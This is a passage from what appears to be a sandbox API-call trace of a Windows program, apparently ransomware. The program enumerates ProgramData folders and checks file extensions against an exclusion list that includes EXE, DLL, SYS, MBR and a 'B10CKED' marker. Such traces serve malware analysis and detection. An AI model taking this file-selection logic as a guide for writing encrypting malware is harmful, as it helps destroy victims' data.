lpFindFileData=0x12e908) returned 0x1c7fe8 [0108.518] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.518] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.518] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\EN-US\\") returned 0x5c [0108.518] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\EN-US\\") returned 0x5c [0108.518] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\EN-US\\") returned 0x5c [0108.518] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\EN-US\\") returned 0x5c [0108.518] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\EN-US\\") returned 0x5c [0108.518] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\EN-US\\") returned 0x5c [0108.518] 
CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\EN-US\\") returned 0x5c [0108.518] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\EN-US\\") returned 0x5c [0108.518] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\EN-US\\") returned 0x5c [0108.518] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\EN-US\\") returned 0x5c [0108.518] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\EN-US\\") returned 0x5c [0108.518] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\EN-US\\") returned 0x5c [0108.518] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\EN-US\\") returned 0x5c [0108.519] 
CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\EN-US\\") returned 0x5c [0108.519] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\EN-US\\") returned 0x5c [0108.519] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\EN-US\\") returned 0x5c [0108.519] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\EN-US\\") returned 0x5c [0108.519] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\EN-US\\") returned 0x5c [0108.519] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*.*", lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 0x1c8028 [0108.605] FindNextFileW (in: hFindFile=0x1c8028, lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 1 [0108.605] FindNextFileW (in: hFindFile=0x1c8028, lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 1 [0108.605] CharUpperBuffW (in: lpsz="xml", cchLength=0x3 | out: lpsz="XML") returned 0x3 [0108.605] CompareStringW 
(Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.605] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="XML", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="XML", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, 
lpString2="XML", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="XML", cchCount2=3) returned 2 [0108.606] FindNextFileW (in: hFindFile=0x1c8028, lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 0 [0108.606] FindClose (in: hFindFile=0x1c8028 | out: hFindFile=0x1c8028) returned 1 [0108.606] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.606] CharUpperBuffW (in: lpsz="ico", cchLength=0x3 | out: lpsz="ICO") returned 0x3 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="ICO", cchCount2=3) returned 1 [0108.606] 
CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="ICO", cchCount2=3) returned 1 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="ICO", cchCount2=3) returned 2 [0108.606] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.606] CharUpperBuffW (in: lpsz="ico", cchLength=0x3 | out: lpsz="ICO") returned 0x3 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="ICO", cchCount2=3) returned 1 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 
[0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="ICO", cchCount2=3) returned 1 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="ICO", cchCount2=3) returned 2 [0108.607] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.607] CharUpperBuffW (in: lpsz="ico", cchLength=0x3 | out: lpsz="ICO") returned 0x3 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="ICO", cchCount2=3) returned 1 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="ICO", cchCount2=3) 
returned 1 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="ICO", cchCount2=3) returned 2 [0108.607] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.607] CharUpperBuffW (in: lpsz="ico", cchLength=0x3 | out: lpsz="ICO") returned 0x3 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="ICO", cchCount2=3) returned 1 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="ICO", cchCount2=3) returned 1 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="ICO", cchCount2=3) returned 2 [0108.607] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) 
returned 1 [0108.607] CharUpperBuffW (in: lpsz="ico", cchLength=0x3 | out: lpsz="ICO") returned 0x3 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="ICO", cchCount2=3) returned 1 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="ICO", cchCount2=3) returned 1 [0108.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="ICO", cchCount2=3) returned 2 [0108.608] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.608] CharUpperBuffW (in: lpsz="ico", cchLength=0x3 | out: lpsz="ICO") returned 0x3 [0108.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.608] 
CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="ICO", cchCount2=3) returned 1 [0108.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="ICO", cchCount2=3) returned 1 [0108.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="ICO", cchCount2=3) returned 2 [0108.608] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.608] CharUpperBuffW (in: lpsz="ico", cchLength=0x3 | out: lpsz="ICO") returned 0x3 [0108.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="ICO", cchCount2=3) returned 1 [0108.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 
[0108.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.608] CharUpperBuffW (in: lpsz="xml", cchLength=0x3 | out: lpsz="XML") returned 0x3 [0108.608] FindClose (in: hFindFile=0x1c7fe8 | out: hFindFile=0x1c7fe8) returned 1 [0108.608] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0 [0108.608] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0108.608] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0108.608] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0108.608] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DeviceSync\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICESYNC\\") returned 0x28 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DeviceSync\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICESYNC\\") returned 0x28 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DeviceSync\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICESYNC\\") returned 0x28 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DeviceSync\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICESYNC\\") returned 0x28 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DeviceSync\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICESYNC\\") returned 0x28 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DeviceSync\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICESYNC\\") returned 0x28 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DeviceSync\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL 
USERS\\MICROSOFT\\DEVICESYNC\\") returned 0x28 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DeviceSync\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICESYNC\\") returned 0x28 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DeviceSync\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICESYNC\\") returned 0x28 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DeviceSync\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICESYNC\\") returned 0x28 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DeviceSync\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICESYNC\\") returned 0x28 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DeviceSync\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICESYNC\\") returned 0x28 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DeviceSync\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICESYNC\\") returned 0x28 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DeviceSync\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICESYNC\\") returned 0x28 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DeviceSync\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICESYNC\\") returned 0x28 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DeviceSync\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICESYNC\\") returned 0x28 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DeviceSync\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICESYNC\\") returned 0x28 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DeviceSync\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICESYNC\\") returned 0x28 [0108.609] FindFirstFileW 
(in: lpFileName="C:\\Users\\All Users\\Microsoft\\DeviceSync\\*.*", lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0x1c7f68 [0108.609] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0108.609] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0108.609] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0108.609] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\") returned 0x21 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\") 